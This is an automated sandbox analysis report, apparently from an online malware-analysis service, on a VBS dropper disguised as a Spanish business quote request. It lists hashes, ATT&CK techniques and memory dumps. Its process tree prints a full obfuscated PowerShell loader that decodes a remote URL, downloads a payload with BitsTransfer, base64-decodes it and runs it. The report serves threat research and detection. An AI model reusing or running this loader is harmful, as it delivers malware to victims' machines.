ad139795c685f1eeb0c701d8734adf5abc4da488477678e825017c2d8b4a1b36

Analysis

max time kernel
142s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20231020-es
resource tags

arch:x64arch:x86image:win10v2004-20231020-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
23-10-2023 08:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PT90490 Solicitud oferta DISELECTRIC SIEMENS 10_23_2023.vbs
Size

19KB
MD5

fd9f257ede4256e537566a2588c025b4
SHA1

ac08110a794c0d073c070a31d26dad8b01fb9b1f
SHA256

f4815b87e81d4b6371326db31b0cb71d201d774f4fca8e866692768030fff729
SHA512

d801d138e20def7ace0a1c37866ab50195a88d7d877c6af03cab84db6b401ef25546367248e8d4662da2914c91ee9f0eda575c4f430792629ef36c6aa58dc281
SSDEEP

384:jwZrIvxXwh6QnSuFehpKfI6SwJbVNDlJD/vWEMFWmqFs9FFZlE+vg:jwZ4g4HuoCRh1lh/vW0mlfVEr

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-568313063-1441237985-1542345083-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
1500	ping.exe
5008	ping.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4496	powershell.exe
4496	powershell.exe
3328	powershell.exe
3328	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	3328	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 4540 wrote to memory of 1500	4540	WScript.exe	83
PID 4540 wrote to memory of 1500	4540	WScript.exe	83
PID 4540 wrote to memory of 5008	4540	WScript.exe	85
PID 4540 wrote to memory of 5008	4540	WScript.exe	85
PID 4540 wrote to memory of 2852	4540	WScript.exe	88
PID 4540 wrote to memory of 2852	4540	WScript.exe	88
PID 4540 wrote to memory of 4496	4540	WScript.exe	90
PID 4540 wrote to memory of 4496	4540	WScript.exe	90
PID 4496 wrote to memory of 3328	4496	powershell.exe	95
PID 4496 wrote to memory of 3328	4496	powershell.exe	95
PID 4496 wrote to memory of 3328	4496	powershell.exe	95

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PT90490 Solicitud oferta DISELECTRIC SIEMENS 10_23_2023.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4540
- C:\Windows\System32\ping.exe
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:1500
- C:\Windows\System32\ping.exe
  ping %.%.%.%
  2⤵
  - Runs ping.exe
  PID:5008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c dir
  2⤵
  PID:2852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Inspirato9 ([String]$Laplandsu){$Tatrassu=$Laplandsu.toCharArray();For($Elfl=5; $Elfl -lt $Tatrassu.count-1; $Elfl+=6){$Udblse+=$Tatrassu[$Elfl]};$Udblse;}$sabotrerne=Inspirato9 'AmandhKugletskobrt BaanpMinersBetrk:Skytt/Grogr/UnswadMennesLkkerpDuplisGunmaiChoulb EuroiGeocouIdles. LipprLinieoGagse/ApterT AdmerMediaaMontrnAlaitsKardeaTaktimToldsiSepta.LichedBefris MisspKjrsg ';$Udblse01=Inspirato9 'RundkiDezyme BattxNytte ';$Pillspilfr = Inspirato9 ' Meta\Roekusprotry BenesBjergwudkmpo PolywBiopl6 Thes4Skarp\tonesWCantiiStormnForredKrlleo gestw SladsSlettPImpono IndswSigmoe DefirDemilSUindbhFlerbeKarollMasselRotte\forfrvSuper1Maski.Nativ0 Sign\Reinsp inteoKonstwfortleVegetrUdhvns LornhDagloeItoislKultil Gala. Broke RevixFatameBryst '; & ($Udblse01) (Inspirato9 'Alcoh$BourbFSrtjeoDrakorMononeOuphss Forbh steaomajedrCirkutMerkue Hype2Ansva= Auto$Gabgae KhojnHulefvDaarl: EradwEsponiAbandn RotudKrestirebelrGrads ') ; . ($Udblse01) (Inspirato9 ' Syge$CongePSheepiKradslMoleklParvesHjemfp NoniiCampalTicklfKonfurBjerg=Julie$BryopFAfskeoRattorAfbrdeSnaggsFollih KylloVedvarEufortChiaoeForst2Efter+ Noni$ AverPTartli FstelMistelMilitsUgaripcuterisoledlAntisfdragnr Unde ') ; & ($Udblse01) (Inspirato9 'Nemat$FunktBCaledrSalinnkjortdParaleRacerkEmbednProbeuFolkedTrilie Rans Apode=Extra Reall(Gader(BanklgArchiwBetjemFordaiFrasi Delprw earti Blren Delt3Aplom2 Jack_ SydopUdspirKonomoToridcDepluepreags StelsVirks Epap-HuemuFHoejr SkedePImbelr Spaao SweacVildteVrelssTekstsProviICultudgstel= Knap$norse{NonauPCupbeIIdrtsDBrill}Maked)pigsk.NumerC PermoOvercmBillfm Bloda Krypn Whisd missL Fjeri DugrnClasseSnude)Scaph Intro-Payabsaffalp HypelColleiTwicetGenne Forlj[ NonscSurrehTalenaallenrnucle]Fortr3Marce4Farao '); & ($Udblse01) (Inspirato9 'Honch$ SociCBoldehEntreaIncommHatteoMiriar KontrMicroo EyesbInter Frigi=bolet Allo$EllipBHaresrDemyknErlindLandbe LednkSerien Sandu Anmod RingeAdeni[Neoge$ ByfoB SmalraksionSaccod EspieOverrkPolitnCenteuRolled RegieSyste.Mountc Koldo MouluAflevnLakritShrub-Timel2Subar] Tile '); . ($Udblse01) (Inspirato9 'Udsag$BucrnKAnaphldjrveo TephgMelboeDeartsVarmepRelig=Super( QuinTSuggeeKvstusInvantTilfr- UdsmPAndedaIndkbtImprehMetho Nymar$beatnPKommuiSkikkl Kernl PantsBordepVskediPleasl GlidfgaestrSorte)Cente Kend-TskinAChamfnErstadBnhre Assur(Lance[SaponIForlinMelantBlodfPVenditIndicrNorma]Fluff: Inve:DisansSnubuiForskzStemmeUnsup Melis-TenuieTudehqplaty Konc8Sprau) Tool ') ;if ($Klogesp) {.$Pillspilfr $Chamorrob;} else {;$Udblse00=Inspirato9 'FoevaSAntimtBelinaSubvirBonettPrepe-EfoveBKontriPaulotcentrsForulTAsherrUngkaaUnmornSortesArbejfderiveBralrrGynec Jumbo- GatfSFejltoBlokpuElysirBefracUnsareBloke sleev$HydrosBronkaTasklbsultnothougtSacrorTartueObligrPantanSikkeeUnstr Biju-standDArauceLeadesAlleht UdspiKonflnBrugeaThermt StefiregnsoDirekn loui Noma$TitanFSemitoAvdpfrRespoeVectos AgamhKoreroStatarAmyratBladkeVeali2Drape '; . ($Udblse01) (Inspirato9 ' Tele$AristFBgeskoHikkerMuldneDybsis BobbhLameloUdsltrInvadtSysteeCuerp2Overt=Sabba$ RikoeLemmunKviksvSelvo:Krakea AdfrpDemorp AggrdDriecaMonsttSalvaaBridg ') ; & ($Udblse01) (Inspirato9 'AzideIStranm GlyppLogisoReprorPeelstTwang-AsphaMCloseo DocidPieteu Undel Udsue Mali ProheBIntemiLibeltMalajsLeverTHumilrTransaEnalinspecisDahlifDisafeTidsfrLandb ') ;$Foreshorte2=$Foreshorte2+'\Vandri.pre';while (-not $Konverg) { . ($Udblse01) (Inspirato9 'Ungra$StatuKSubseo partn Sperv Perie ZymerBaskegKolon= Best(FlitsTLungyeLovresurototSarco-RelapPDagleaAalegtkredihMitme Tvrsu$persaFEmaljo OperrBrockeMinersLedigh ClimoPostar AnthtVaskueKatas2Indad)Chron ') ; & ($Udblse01) $Udblse00; & ($Udblse01) (Inspirato9 'TintaSForvetSunkiaUniterPastntaccel-UrobeSUpchilRakleePaagreSkulkpRecip Dama5Sortl ');}& ($Udblse01) (Inspirato9 ' pref$betydISciatnThirtsDiastpRewediDualirValgbaForsktskoleoDenni High=Sldef BkkenGAdkomeReantt Scre-pygmeC WireoBronznAarvatGeocee ScennUnseat Flav Belas$MatroFPresuoVoldtr DkneeUdgifsSavouhTarpao smakrAbjectAprileFlyst2Poler '); & ($Udblse01) (Inspirato9 'Trykf$ demuKPibetogudennSulfovLandve triarMinusgPhone Overf=Udval Udval[ InteS MollyIvrkssDaglntTvange SynemPrude. TegnCOctopotonotn SemivSmarae ExcirKatintDyneb]Title:Films:CoronF CranrSknheo Lacqm IranB BilkaPrgtistegneeAfpat6Eleva4StraeSTrudgtKoagurSightiFlagsnrundsghyper(Hanta$HemidIStyrknBagmnskorrepFrankibitter DejeaViljetNosoloUncon)Sinds '); & ($Udblse01) (Inspirato9 'Huhcr$WindsUChunkd Subdb Gasrl UdvisRattleCurta2 Kont Prece=Carno Nonfo[OligoSEjerlyAffals StretNudzheKoncimGrske.UninjT SuggePanthxPliretquadi.StaniE LrecnNokbncUnderoDicotdTildeiTorrenIdentgPinno]Logic:misvi:InterAFrdigS TwinC SemmI IndgI Pero.SchenG DobbeLithotJgerkSfortjtGunyarAncyli Haemn KopugSteri(Enspn$ ReceK HjeroReason Tranv ExpaeRednir Bestgcockt)Tunne '); & ($Udblse01) (Inspirato9 'Piete$VkstrWFaturh LumpeDowseebrugs= Apol$BumpeUUnbapd ServbAfprolFjeldsBrandeJaran2Forkl.InsecsGuiltu CaptbFredssVetertmatrirDingeiRntgenDumpeguntot(Ophrp2Progr7 dist1Ordgy6Ideal9Lgeho0 Cara,Chene2Judic5Sprit3Spher2Nonir5Psych)Undve '); . ($Udblse01) $Whee;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4496
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Inspirato9 ([String]$Laplandsu){$Tatrassu=$Laplandsu.toCharArray();For($Elfl=5; $Elfl -lt $Tatrassu.count-1; $Elfl+=6){$Udblse+=$Tatrassu[$Elfl]};$Udblse;}$sabotrerne=Inspirato9 'AmandhKugletskobrt BaanpMinersBetrk:Skytt/Grogr/UnswadMennesLkkerpDuplisGunmaiChoulb EuroiGeocouIdles. LipprLinieoGagse/ApterT AdmerMediaaMontrnAlaitsKardeaTaktimToldsiSepta.LichedBefris MisspKjrsg ';$Udblse01=Inspirato9 'RundkiDezyme BattxNytte ';$Pillspilfr = Inspirato9 ' Meta\Roekusprotry BenesBjergwudkmpo PolywBiopl6 Thes4Skarp\tonesWCantiiStormnForredKrlleo gestw SladsSlettPImpono IndswSigmoe DefirDemilSUindbhFlerbeKarollMasselRotte\forfrvSuper1Maski.Nativ0 Sign\Reinsp inteoKonstwfortleVegetrUdhvns LornhDagloeItoislKultil Gala. Broke RevixFatameBryst '; & ($Udblse01) (Inspirato9 'Alcoh$BourbFSrtjeoDrakorMononeOuphss Forbh steaomajedrCirkutMerkue Hype2Ansva= Auto$Gabgae KhojnHulefvDaarl: EradwEsponiAbandn RotudKrestirebelrGrads ') ; . ($Udblse01) (Inspirato9 ' Syge$CongePSheepiKradslMoleklParvesHjemfp NoniiCampalTicklfKonfurBjerg=Julie$BryopFAfskeoRattorAfbrdeSnaggsFollih KylloVedvarEufortChiaoeForst2Efter+ Noni$ AverPTartli FstelMistelMilitsUgaripcuterisoledlAntisfdragnr Unde ') ; & ($Udblse01) (Inspirato9 'Nemat$FunktBCaledrSalinnkjortdParaleRacerkEmbednProbeuFolkedTrilie Rans Apode=Extra Reall(Gader(BanklgArchiwBetjemFordaiFrasi Delprw earti Blren Delt3Aplom2 Jack_ SydopUdspirKonomoToridcDepluepreags StelsVirks Epap-HuemuFHoejr SkedePImbelr Spaao SweacVildteVrelssTekstsProviICultudgstel= Knap$norse{NonauPCupbeIIdrtsDBrill}Maked)pigsk.NumerC PermoOvercmBillfm Bloda Krypn Whisd missL Fjeri DugrnClasseSnude)Scaph Intro-Payabsaffalp HypelColleiTwicetGenne Forlj[ NonscSurrehTalenaallenrnucle]Fortr3Marce4Farao '); & ($Udblse01) (Inspirato9 'Honch$ SociCBoldehEntreaIncommHatteoMiriar KontrMicroo EyesbInter Frigi=bolet Allo$EllipBHaresrDemyknErlindLandbe LednkSerien Sandu Anmod RingeAdeni[Neoge$ ByfoB SmalraksionSaccod EspieOverrkPolitnCenteuRolled RegieSyste.Mountc Koldo MouluAflevnLakritShrub-Timel2Subar] Tile '); . ($Udblse01) (Inspirato9 'Udsag$BucrnKAnaphldjrveo TephgMelboeDeartsVarmepRelig=Super( QuinTSuggeeKvstusInvantTilfr- UdsmPAndedaIndkbtImprehMetho Nymar$beatnPKommuiSkikkl Kernl PantsBordepVskediPleasl GlidfgaestrSorte)Cente Kend-TskinAChamfnErstadBnhre Assur(Lance[SaponIForlinMelantBlodfPVenditIndicrNorma]Fluff: Inve:DisansSnubuiForskzStemmeUnsup Melis-TenuieTudehqplaty Konc8Sprau) Tool ') ;if ($Klogesp) {.$Pillspilfr $Chamorrob;} else {;$Udblse00=Inspirato9 'FoevaSAntimtBelinaSubvirBonettPrepe-EfoveBKontriPaulotcentrsForulTAsherrUngkaaUnmornSortesArbejfderiveBralrrGynec Jumbo- GatfSFejltoBlokpuElysirBefracUnsareBloke sleev$HydrosBronkaTasklbsultnothougtSacrorTartueObligrPantanSikkeeUnstr Biju-standDArauceLeadesAlleht UdspiKonflnBrugeaThermt StefiregnsoDirekn loui Noma$TitanFSemitoAvdpfrRespoeVectos AgamhKoreroStatarAmyratBladkeVeali2Drape '; . ($Udblse01) (Inspirato9 ' Tele$AristFBgeskoHikkerMuldneDybsis BobbhLameloUdsltrInvadtSysteeCuerp2Overt=Sabba$ RikoeLemmunKviksvSelvo:Krakea AdfrpDemorp AggrdDriecaMonsttSalvaaBridg ') ; & ($Udblse01) (Inspirato9 'AzideIStranm GlyppLogisoReprorPeelstTwang-AsphaMCloseo DocidPieteu Undel Udsue Mali ProheBIntemiLibeltMalajsLeverTHumilrTransaEnalinspecisDahlifDisafeTidsfrLandb ') ;$Foreshorte2=$Foreshorte2+'\Vandri.pre';while (-not $Konverg) { . ($Udblse01) (Inspirato9 'Ungra$StatuKSubseo partn Sperv Perie ZymerBaskegKolon= Best(FlitsTLungyeLovresurototSarco-RelapPDagleaAalegtkredihMitme Tvrsu$persaFEmaljo OperrBrockeMinersLedigh ClimoPostar AnthtVaskueKatas2Indad)Chron ') ; & ($Udblse01) $Udblse00; & ($Udblse01) (Inspirato9 'TintaSForvetSunkiaUniterPastntaccel-UrobeSUpchilRakleePaagreSkulkpRecip Dama5Sortl ');}& ($Udblse01) (Inspirato9 ' pref$betydISciatnThirtsDiastpRewediDualirValgbaForsktskoleoDenni High=Sldef BkkenGAdkomeReantt Scre-pygmeC WireoBronznAarvatGeocee ScennUnseat Flav Belas$MatroFPresuoVoldtr DkneeUdgifsSavouhTarpao smakrAbjectAprileFlyst2Poler '); & ($Udblse01) (Inspirato9 'Trykf$ demuKPibetogudennSulfovLandve triarMinusgPhone Overf=Udval Udval[ InteS MollyIvrkssDaglntTvange SynemPrude. TegnCOctopotonotn SemivSmarae ExcirKatintDyneb]Title:Films:CoronF CranrSknheo Lacqm IranB BilkaPrgtistegneeAfpat6Eleva4StraeSTrudgtKoagurSightiFlagsnrundsghyper(Hanta$HemidIStyrknBagmnskorrepFrankibitter DejeaViljetNosoloUncon)Sinds '); & ($Udblse01) (Inspirato9 'Huhcr$WindsUChunkd Subdb Gasrl UdvisRattleCurta2 Kont Prece=Carno Nonfo[OligoSEjerlyAffals StretNudzheKoncimGrske.UninjT SuggePanthxPliretquadi.StaniE LrecnNokbncUnderoDicotdTildeiTorrenIdentgPinno]Logic:misvi:InterAFrdigS TwinC SemmI IndgI Pero.SchenG DobbeLithotJgerkSfortjtGunyarAncyli Haemn KopugSteri(Enspn$ ReceK HjeroReason Tranv ExpaeRednir Bestgcockt)Tunne '); & ($Udblse01) (Inspirato9 'Piete$VkstrWFaturh LumpeDowseebrugs= Apol$BumpeUUnbapd ServbAfprolFjeldsBrandeJaran2Forkl.InsecsGuiltu CaptbFredssVetertmatrirDingeiRntgenDumpeguntot(Ophrp2Progr7 dist1Ordgy6Ideal9Lgeho0 Cara,Chene2Judic5Sprit3Spher2Nonir5Psych)Undve '); . ($Udblse01) $Whee;}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rfpzalgq.03y.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3328-37-0x0000000006360000-0x000000000637E000-memory.dmp

Filesize
120KB

Download
memory/3328-49-0x00000000079F0000-0x0000000007A04000-memory.dmp

Filesize
80KB

Download
memory/3328-59-0x0000000008D80000-0x000000000AD03000-memory.dmp

Filesize
31.5MB

Download
memory/3328-38-0x00000000063A0000-0x00000000063EC000-memory.dmp

Filesize
304KB

Download
memory/3328-58-0x0000000008D80000-0x000000000AD03000-memory.dmp

Filesize
31.5MB

Download
memory/3328-40-0x0000000007BA0000-0x000000000821A000-memory.dmp

Filesize
6.5MB

Download
memory/3328-57-0x0000000007A90000-0x0000000007A91000-memory.dmp

Filesize
4KB

Download
memory/3328-39-0x0000000004D50000-0x0000000004D60000-memory.dmp

Filesize
64KB

Download
memory/3328-17-0x0000000002870000-0x00000000028A6000-memory.dmp

Filesize
216KB

Download
memory/3328-18-0x00000000747C0000-0x0000000074F70000-memory.dmp

Filesize
7.7MB

Download
memory/3328-19-0x0000000004D50000-0x0000000004D60000-memory.dmp

Filesize
64KB

Download
memory/3328-20-0x0000000005390000-0x00000000059B8000-memory.dmp

Filesize
6.2MB

Download
memory/3328-21-0x0000000005300000-0x0000000005382000-memory.dmp

Filesize
520KB

Download
memory/3328-22-0x00000000059C0000-0x00000000059E2000-memory.dmp

Filesize
136KB

Download
memory/3328-23-0x0000000005A60000-0x0000000005AC6000-memory.dmp

Filesize
408KB

Download
memory/3328-26-0x0000000005B80000-0x0000000005BE6000-memory.dmp

Filesize
408KB

Download
memory/3328-34-0x0000000005D30000-0x0000000006084000-memory.dmp

Filesize
3.3MB

Download
memory/3328-35-0x0000000005B60000-0x0000000005B70000-memory.dmp

Filesize
64KB

Download
memory/3328-36-0x00000000061D0000-0x00000000062D2000-memory.dmp

Filesize
1.0MB

Download
memory/3328-55-0x0000000004D50000-0x0000000004D60000-memory.dmp

Filesize
64KB

Download
memory/3328-54-0x0000000007760000-0x0000000007768000-memory.dmp

Filesize
32KB

Download
memory/3328-53-0x0000000004D50000-0x0000000004D60000-memory.dmp

Filesize
64KB

Download
memory/3328-52-0x0000000004D50000-0x0000000004D60000-memory.dmp

Filesize
64KB

Download
memory/3328-41-0x0000000006920000-0x000000000693A000-memory.dmp

Filesize
104KB

Download
memory/3328-42-0x0000000007630000-0x00000000076C6000-memory.dmp

Filesize
600KB

Download
memory/3328-44-0x0000000007550000-0x0000000007572000-memory.dmp

Filesize
136KB

Download
memory/3328-51-0x00000000747C0000-0x0000000074F70000-memory.dmp

Filesize
7.7MB

Download
memory/3328-45-0x00000000087D0000-0x0000000008D74000-memory.dmp

Filesize
5.6MB

Download
memory/3328-48-0x0000000007970000-0x0000000007992000-memory.dmp

Filesize
136KB

Download
memory/4496-47-0x000002CFC6760000-0x000002CFC6770000-memory.dmp

Filesize
64KB

Download
memory/4496-46-0x000002CFC6760000-0x000002CFC6770000-memory.dmp

Filesize
64KB

Download
memory/4496-11-0x000002CFE0E70000-0x000002CFE0E80000-memory.dmp

Filesize
64KB

Download
memory/4496-50-0x000002CFC6760000-0x000002CFC6770000-memory.dmp

Filesize
64KB

Download
memory/4496-43-0x00007FFF98050000-0x00007FFF98B11000-memory.dmp

Filesize
10.8MB

Download
memory/4496-14-0x000002CFC6760000-0x000002CFC6770000-memory.dmp

Filesize
64KB

Download
memory/4496-16-0x000002CFC6760000-0x000002CFC6770000-memory.dmp

Filesize
64KB

Download
memory/4496-12-0x000002CFE11D0000-0x000002CFE12D2000-memory.dmp

Filesize
1.0MB

Download
memory/4496-0-0x000002CFE0EF0000-0x000002CFE0F72000-memory.dmp

Filesize
520KB

Download
memory/4496-15-0x000002CFC6760000-0x000002CFC6770000-memory.dmp

Filesize
64KB

Download
memory/4496-13-0x00007FFF98050000-0x00007FFF98B11000-memory.dmp

Filesize
10.8MB

Download
memory/4496-6-0x000002CFE0E90000-0x000002CFE0EB2000-memory.dmp

Filesize
136KB

Download